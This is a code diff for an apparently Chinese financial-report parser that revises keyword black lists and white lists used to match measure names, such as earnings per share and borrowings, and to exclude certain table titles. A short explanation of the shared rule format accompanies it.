+    ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
+    ,'非经常性损益:扣除非经常性损益'
+    ,'基本每股收益:稀释每股收益,发行新股'
+    ,'稀释每股收益:基本每股收益,发行新股'
+    ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
+    ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
+    ,'应付账款:应收账款,年以上,内,至,到'
+    ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
+    ,'研发投入:比例,比率,占比,费用,占'
+    ,'资本化研发投入:比例,比率,占比,费用,占'
+    ,'资本化研发投入占比:金额,费用'
+    ,'研发投入占营业收入比例:金额,费用'
+    ,'上年年末:1月1日'
+    ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
     ,'期扣非加权平均净资产收益率:同比,年化,每股'
     ,'加权平均净资产收益率同比变动:年化,每股'
-    ,'研发费用:制造,投入,直接,管理','应收账款:1-2年','货币资金:在途'
-    ,'当期:2023年1-6月,调整后','营业成本:营业总成本','长期借债:年内到期','研发投入:直接'
-    ,'第一季度:第二季度,第三季度,第四季度','第二季度:第一季度,第三季度,第四季度','第三季度:第二季度,第一季度,第四季度','第四季度:第二季度,第三季度,第一季度'
-    ,'研发费用:研发支出,研发投入','存货:跌价准备','费用:日常,付现','固定资产:改良,补助,投资']
+    ,'研发费用:制造,投入,直接,管理'
+    ,'应收账款:1-2年','货币资金:在途'
+    ,'当期:2023年1-6月,调整后'
+    ,'营业成本:营业总成本'
+    ,'长期借债:年内到期','研发投入:直接'
+    ,'第一季度:第二季度,第三季度,第四季度'
+    ,'第二季度:第一季度,第三季度,第四季度'
+    ,'第三季度:第二季度,第一季度,第四季度'
+    ,'第四季度:第二季度,第三季度,第一季度'
+    ,'研发费用:研发支出,研发投入','存货:跌价准备'
+    ,'费用:日常,付现','固定资产:改良,补助,投资']
     # current_period = f'当期:{report_year}年1-6月'
     # black_array.append(current_period)
     for black in black_array:
@ -303,12 +342,13 @@ def check_black_list_old(meta_measure,pdf_measure):
             if pdf_measure.find(pdf) >= 0:
                 return True
     return False
 
 def check_white_list(meta_measure,pdf_measure):
-    white_array = ['基本每股收益:每股收益', '加权平均净资产收益率同比变动:比', '季度变动比例:比', '加权平均净资产收益率:比']
+    white_array = ['基本每股收益:每股收益','加权平均净资产收益率同比变动:比','季度变动比例:比']
     for black in white_array:
         black_meta = black.split(':')[0]
         black_pdfs = black.split(':')[1].split(',')
-        if meta_measure.find(black_meta) >= 0:
+        if black_meta in meta_measure:
             for pdf in black_pdfs:
                 if pdf_measure.find(pdf) < 0:
                     return True
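Both lists share one compact rule format, 'meta:word1,word2': the text before the colon selects the meta measure, and the comma-separated words after it are tested against the extracted name. A sketch of that shared convention, using a hypothetical helper that is not part of the module:

# Sketch of the 'meta:word1,word2' rule format shared by the black and
# white lists; rule_hits is a hypothetical helper, not the module's API.
def rule_hits(rules, meta_measure, pdf_measure):
    for rule in rules:
        meta, words = rule.split(':')
        if meta in meta_measure:
            if any(w in pdf_measure for w in words.split(',')):
                return True
    return False

black = ['总资产:净资产', '短期借款:长期借款']
print(rule_hits(black, '报告期末总资产', '2024年3月31日净资产'))  # True -> reject the match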
@ -384,7 +424,7 @@ def check_table_title_black_list_measure(text):
     #black_array = ['补充资料:研发费用,管理费用,财务费用'
     #              ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
     #]
-    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产"""
+    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产|计息金融工具|坏账准备"""
     if len(re.findall(table_title_black_list, text)) > 0:
         return True
     return False
@ -493,6 +533,8 @@ def check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,co
     ,'持有待售资产:固定资产'
     ,'账龄超过 1 年或逾期的重要应付账款:应付账款'
     ,'经营租赁资产:固定资产'
+    ,'计息金融工具:货币资金,短期借款,交易性金融资产'
+    ,'坏账准备:应收账款'
     ]
     for black in black_array:
         black_meta = black.split(':')[0]
@ -514,6 +556,7 @@ def check_black_table_list(data):
         black_meta = black.split(':')[0]
         black_pdfs = black.split(':')[1].split(',')
         if any(black_meta in cell for row in data for cell in row):
+            print(data)
             for pdf in black_pdfs:
                 data = [row for row in data if not any(pdf in cell for cell in row)]
     return data